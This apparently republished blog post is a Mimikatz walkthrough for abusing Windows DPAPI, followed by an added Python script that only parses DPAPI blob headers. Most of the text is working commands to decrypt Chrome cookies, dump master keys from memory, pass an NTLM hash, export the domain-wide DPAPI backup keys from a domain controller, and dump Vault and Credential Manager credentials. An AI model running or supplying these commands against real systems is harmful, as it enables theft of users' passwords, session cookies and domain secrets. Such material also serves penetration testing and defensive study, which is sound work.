
Abusing DPAPI using Mimikatz


What is DPAPI

According to Wikipedia, DPAPI (Data Protection Application Programming Interface) is a simple cryptographic application programming interface available as a built-in component in Windows 2000 and later versions of Microsoft Windows operating systems. In theory the Data Protection API can enable symmetric encryption of any kind of data; in practice, its primary use in the Windows operating system is to perform symmetric encryption of asymmetric private keys, using a user or system secret as a significant contribution of entropy.


Abusing DPAPI 

#Decrypting Chrome data when you have code execution on the target
dpapi::chrome /in:"%localappdata%\Google\Chrome\User Data\Default\Cookies" /unprotect

#Decrypting Chrome data when the user is logged in and we have admin access
#Get the user's master key using mimikatz

mimikatz.exe
sekurlsa::dpapi
sekurlsa::msv
#Show the decrypted content of the cookies
dpapi::chrome /in:"c:\users\bhanu\appdata\local\Google\Chrome\User Data\Default\Cookies" /masterkey:t87fd5fdsftdsf5tds9f8dstf96ds5ds965f67sdftr67dssdf6ds87bf6ds8

#Decrypting Chrome data when the user is NOT logged in and we have admin access, using mimikatz
#The NTLM hash or plaintext password of the user is required

dpapi::masterkey /in: /sid: /password: /protected

#Decrypt the master key when we know the user's password
dpapi::masterkey /in:"User_KEy" /sid: /password: /protected

#Decrypt the master key using the current credentials via RPC
dpapi::masterkey /in: /rpc
dpapi::masterkey /in:"C:\Users\bhanu\AppData\Roaming\Microsoft\Protect\S-1-5-21-803410069-3844050295-3216536831-1001\dg54tg-54g52-sad232r" /rpc
#Now you can decrypt the credentials from Credential Manager
dpapi::creds /in:"C:\Users\bhanu\AppData\Local\Microsoft\Credentials\" /masterkey: /unprotect

#In case we only know the user's hash
sekurlsa::pth /user:User_Name /domain:Steins.local /ntlm:98d6sa987dytsa7d9gsa987dagd
dpapi::masterkey /in:"C:\Users\bhanu\AppData\Roaming\Microsoft\Protect\S-1-5-21-803410069-3844050295-3216536831-1001\adssad32q-waE32q432-ae3q432-Ae3q432" /rpc
dpapi::masterkey /in:""
#Decrypt Chrome data
dpapi::chrome /in:"c:\users\bhanu\appdata\local\Google\Chrome\User Data\Default\Cookies"

#When you have access to the Domain Controller
#Domain users' master keys are also protected with a domain-wide DPAPI backup key; once extracted, it can decrypt any domain user's master key.

#Dump the backup keys
lsadump::backupkeys /system: /export
#Use these keys to decrypt data on any target machine in the same domain
dpapi::masterkey /in:"" /pvk:
dpapi::chrome /in:"c:\users\bhanu\appdata\local\Google\Chrome\User Data\Default\Cookies"

#Decrypting Vault credentials using mimikatz
#Vault creds and the AES keys used to encrypt them are stored
#under C:\Users\bhanu\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28
vault::list
#For plaintext creds
vault::cred
vault::cred /patch
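Every command above that takes /masterkey or /in:<master key file> depends on matching a protected blob to the right master key GUID under ...\Protect\<SID>\. The following is an added example (my own code, not from the original post or from mimikatz) that parses a DPAPI blob header following the publicly documented blob layout used by open-source DPAPI parsers, and reports the master key GUID, the scope flag and the algorithms in use; the sample blob is constructed inline and contains filler bytes, not real encrypted data.

```python
import struct
import uuid
DPAPI_PROVIDER_GUID = uuid.UUID("df9d8cd0-1501-11d1-8c7a-00c04fc297eb")  # fixed in every blob
ALG_NAMES = {0x6603: "CALG_3DES", 0x6610: "CALG_AES_256", 0x8004: "CALG_SHA1", 0x800E: "CALG_SHA_512"}
CRYPTPROTECT_LOCAL_MACHINE = 0x4  # machine scope: needs the system master key, not a user's

def _u32(buf, off):
    return struct.unpack_from("<I", buf, off)[0], off + 4

def _lv(buf, off):  # length-prefixed field: u32 byte count, then the bytes
    n, off = _u32(buf, off)
    if off + n > len(buf):
        raise ValueError("truncated DPAPI blob")
    return buf[off:off + n], off + n

def parse_dpapi_blob(blob):
    """Walk the blob header and report which master key and algorithms it references."""
    version, off = _u32(blob, 0)
    provider, off = uuid.UUID(bytes_le=blob[off:off + 16]), off + 16
    if version != 1 or provider != DPAPI_PROVIDER_GUID:
        raise ValueError("not a DPAPI blob")
    _mk_version, off = _u32(blob, off)
    mk_guid, off = uuid.UUID(bytes_le=blob[off:off + 16]), off + 16
    flags, off = _u32(blob, off)
    desc, off = _lv(blob, off)
    alg_crypt, off = _u32(blob, off)
    alg_crypt_bits, off = _u32(blob, off)
    salt, off = _lv(blob, off)
    _strong, off = _lv(blob, off)  # "strong" entropy field, normally empty
    alg_hash, off = _u32(blob, off)
    _alg_hash_bits, off = _u32(blob, off)
    _hmac_field, off = _lv(blob, off)
    ciphertext, off = _lv(blob, off)
    sign, off = _lv(blob, off)
    return {"masterkey_guid": str(mk_guid),  # file name under ...\Protect\<SID>\
            "machine_scope": bool(flags & CRYPTPROTECT_LOCAL_MACHINE),
            "description": desc.decode("utf-16-le").rstrip("\x00"),
            "cipher": ALG_NAMES.get(alg_crypt, hex(alg_crypt)), "cipher_bits": alg_crypt_bits,
            "hash": ALG_NAMES.get(alg_hash, hex(alg_hash)), "salt_len": len(salt),
            "ciphertext_len": len(ciphertext), "sign_len": len(sign)}

def build_sample_blob(mk_guid, machine_scope=False):
    """Constructed sample in the same layout; payload bytes are filler, not real ciphertext."""
    lv = lambda b: struct.pack("<I", len(b)) + b
    flags = CRYPTPROTECT_LOCAL_MACHINE if machine_scope else 0
    return (struct.pack("<I", 1) + DPAPI_PROVIDER_GUID.bytes_le + struct.pack("<I", 1)
            + uuid.UUID(mk_guid).bytes_le + struct.pack("<I", flags)
            + lv("Local Credential Data\x00".encode("utf-16-le"))
            + struct.pack("<II", 0x6610, 256) + lv(b"\x11" * 32) + lv(b"") + struct.pack("<II", 0x800E, 512)
            + lv(b"\x22" * 32) + lv(b"\x33" * 48) + lv(b"\x44" * 64))
```

Pointing parse_dpapi_blob at a real Credentials or Vault file tells an analyst which master key file (and whether the user or the system key) a given blob depends on, without decrypting anything.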








This post first appeared on Hacking Dream.
